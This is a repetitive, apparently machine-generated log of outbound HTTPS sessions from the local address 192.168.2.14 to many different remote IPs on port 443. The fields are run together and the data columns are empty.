                                              12872192.168.2.1433220140.52.36.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12873192.168.2.1450676218.68.216.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12874192.168.2.14388804.36.127.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12875192.168.2.1450574209.80.81.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12876192.168.2.1447994199.129.213.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12877192.168.2.1446998142.145.237.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12878192.168.2.1437952160.14.55.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12879192.168.2.1457868116.178.60.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12880192.168.2.145204437.224.250.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12881192.168.2.1441116186.139.102.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12882192.168.2.1453134117.192.121.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12883192.168.2.14547782.207.45.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12884192.168.2.1459272124.167.183.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12885192.168.2.1442704188.43.48.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12886192.168.2.1460300199.75.91.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12887192.168.2.144248887.131.21.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12888192.168.2.145197248.73.78.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12889192.168.2.144273470.142.183.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12890192.168.2.144602088.140.241.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12891192.168.2.143791257.128.215.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12892192.168.2.1457746152.246.90.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12893192.168.2.1447720117.10.15.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12894192.168.2.1439190150.215.12.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12895192.168.2.1433328197.53.88.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12896192.168.2.1434200147.89.39.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12897192.168.2.1441252117.85.100.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12898192.168.2.143454442.186.150.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12899192.168.2.1438458167.31.52.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12900192.168.2.145272647.50.49.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12901192.168.2.144513263.49.10.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12902192.168.2.1444816116.49.219.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12903192.168.2.143866014.159.33.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12904192.168.2.1432876133.6.124.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12905192.168.2.1440126180.236.26.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12906192.168.2.1448648203.148.195.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12907192.168.2.143605089.1.190.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12908192.168.2.145976057.89.169.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12909192.168.2.145949042.8.190.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12910192.168.2.1458070110.160.211.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12911192.168.2.145965289.107.37.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12912192.168.2.1437724180.182.205.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12913192.168.2.1453872169.141.128.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12914192.168.2.1447236160.65.138.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12915192.168.2.1435372139.179.209.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12916192.168.2.1444768197.118.246.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12917192.168.2.1455120190.189.190.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12918192.168.2.144483283.119.122.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12919192.168.2.1448018148.153.120.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12920192.168.2.1451802132.13.47.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12921192.168.2.1456856148.114.67.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12922192.168.2.1449426159.15.67.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12923192.168.2.1454832154.44.208.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12924192.168.2.1445040171.45.25.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12925192.168.2.1438582121.67.254.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12926192.168.2.1442182180.150.63.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12927192.168.2.1443514204.13.141.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12928192.168.2.1444894191.123.132.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12929192.168.2.144717466.81.46.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12930192.168.2.1442104133.100.240.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12931192.168.2.14344629.206.15.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12932192.168.2.1450446155.28.198.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12933192.168.2.144665291.192.203.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12934192.168.2.144706275.175.234.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12935192.168.2.1449512196.26.140.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12936192.168.2.144332824.219.78.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12937192.168.2.1448580169.119.89.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12938192.168.2.144777227.35.245.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12939192.168.2.1441280172.192.181.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12940192.168.2.145100861.229.59.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12941192.168.2.1440170132.180.106.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12942192.168.2.145571468.21.89.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12943192.168.2.1437292179.240.3.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12944192.168.2.1433170175.140.115.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12945192.168.2.1454144144.177.118.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12946192.168.2.1458202149.125.179.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12947192.168.2.143700881.179.109.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12948192.168.2.146062427.29.126.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12949192.168.2.1438616167.114.242.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12950192.168.2.144948243.27.43.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12951192.168.2.1447156174.96.82.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12952192.168.2.1456632139.209.11.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12953192.168.2.1458956195.165.203.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12954192.168.2.1436354201.227.182.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12955192.168.2.144487477.187.86.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12956192.168.2.1438952163.97.24.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12957192.168.2.1457862156.104.230.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12958192.168.2.144884664.2.165.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12959192.168.2.1440696160.199.96.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12960192.168.2.144490444.139.70.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12961192.168.2.1435102116.114.124.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12962192.168.2.144745478.48.227.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12963192.168.2.1437226101.218.234.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12964192.168.2.1455822167.92.113.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12965192.168.2.145100831.102.14.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12966192.168.2.1458462131.206.18.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12967192.168.2.14595182.2.0.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12968192.168.2.145976035.225.32.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12969192.168.2.1440264113.180.132.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12970192.168.2.1445392210.64.208.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12971192.168.2.1433552101.211.11.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12972192.168.2.1439462117.196.108.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12973192.168.2.1452232180.194.37.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12974192.168.2.1450488147.156.137.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12975192.168.2.145757461.4.212.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12976192.168.2.145594891.35.72.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12977192.168.2.1453232202.19.77.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12978192.168.2.1442578146.57.125.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12979192.168.2.1446260193.112.77.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12980192.168.2.1451060129.93.176.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12981192.168.2.144870057.38.151.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12982192.168.2.143437242.83.234.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12983192.168.2.1442570144.195.103.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12984192.168.2.145326082.176.63.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12985192.168.2.1455586118.195.76.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12986192.168.2.1443752167.189.5.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12987192.168.2.1454650113.22.65.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12988192.168.2.1460150219.144.193.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12989192.168.2.145773296.84.170.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12990192.168.2.1441128171.46.122.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12991192.168.2.144149036.115.202.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12992192.168.2.1451938123.180.49.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12993192.168.2.1448012194.56.74.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12994192.168.2.145155845.191.113.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12995192.168.2.1434884147.166.26.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12996192.168.2.1443498134.4.130.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12997192.168.2.144419665.255.34.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12998192.168.2.144615099.16.222.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12999192.168.2.1457832171.249.105.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13000192.168.2.145086252.142.244.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13001192.168.2.144659889.119.68.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13002192.168.2.1437796148.181.135.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13003192.168.2.1456174106.54.44.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13004192.168.2.1433032212.212.207.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13005192.168.2.1439478120.66.48.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13006192.168.2.144692034.98.97.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13007192.168.2.144765251.202.153.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13008192.168.2.1454466145.38.87.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13009192.168.2.145755259.37.98.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13010192.168.2.145849867.134.249.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13011192.168.2.1441950209.225.178.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13012192.168.2.1439390185.196.61.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13013192.168.2.1451670183.31.218.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13014192.168.2.143644819.6.184.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13015192.168.2.1450066222.96.224.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13016192.168.2.144110418.135.104.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13017192.168.2.1450966163.54.2.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13018192.168.2.145991057.251.23.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13019192.168.2.1451842119.211.63.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13020192.168.2.1438580174.85.202.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13021192.168.2.144836254.126.102.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13022192.168.2.1435612153.216.129.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13023192.168.2.14438968.86.48.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13024192.168.2.1454260170.141.248.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13025192.168.2.144521863.79.81.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13026192.168.2.1432774184.48.70.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13027192.168.2.1437864217.230.94.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13028192.168.2.144655636.6.242.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13029192.168.2.1442772132.223.200.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13030192.168.2.145935017.194.67.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13031192.168.2.1445194119.55.76.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13032192.168.2.144564253.215.97.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13033192.168.2.143594069.55.172.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13034192.168.2.143575823.103.71.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13035192.168.2.145516062.235.87.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13036192.168.2.1433600122.75.163.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13037192.168.2.1448894174.227.234.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13038192.168.2.143815217.140.134.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13039192.168.2.144346417.114.205.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13040192.168.2.14594924.29.153.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13041192.168.2.1448616197.139.95.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13042192.168.2.1435692211.220.122.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13043192.168.2.145212478.28.157.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13044192.168.2.145841041.44.155.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13045192.168.2.143707857.148.116.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13046192.168.2.1449986101.155.228.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13047192.168.2.144528490.173.214.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13048192.168.2.143560023.224.194.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13049192.168.2.143757662.208.187.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13050192.168.2.14398624.236.191.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13051192.168.2.1447354142.90.42.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13052192.168.2.1453148220.32.224.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13053192.168.2.144317467.63.6.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13054192.168.2.1438964107.29.76.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13055192.168.2.1445686206.19.196.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13056192.168.2.143517212.17.109.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13057192.168.2.1459888210.192.170.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13058192.168.2.1455978101.214.150.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13059192.168.2.144753253.96.203.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13060192.168.2.1453336128.22.97.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13061192.168.2.144074819.86.24.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13062192.168.2.1446402110.173.222.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13063192.168.2.1456138113.207.101.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13064192.168.2.1434436218.201.61.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13065192.168.2.144679446.23.226.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13066192.168.2.143883888.200.12.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13067192.168.2.144174892.197.14.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13068192.168.2.14394669.160.209.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13069192.168.2.1433374170.50.123.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13070192.168.2.1445966198.113.214.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13071192.168.2.1444052184.29.205.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13072192.168.2.1454914154.229.42.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13073192.168.2.1449116143.159.120.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13074192.168.2.143499218.151.102.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13075192.168.2.143754013.59.185.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13076192.168.2.1446792110.243.52.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13077192.168.2.144632413.147.202.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13078192.168.2.145170242.23.233.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13079192.168.2.145832083.40.170.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13080192.168.2.1444184196.164.222.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13081192.168.2.143876054.110.207.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13082192.168.2.144590295.91.95.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13083192.168.2.1441378155.48.246.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13084192.168.2.143488423.224.30.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13085192.168.2.1445206137.220.159.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13086192.168.2.1448910114.84.137.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13087192.168.2.144398673.59.202.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13088192.168.2.1448050125.83.53.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13089192.168.2.145333444.178.52.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13090192.168.2.1450574173.108.203.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13091192.168.2.1435498211.108.2.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13092192.168.2.1444668154.35.144.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13093192.168.2.1456608177.246.30.220443
                                              TimestampBytes transferredDirectionData


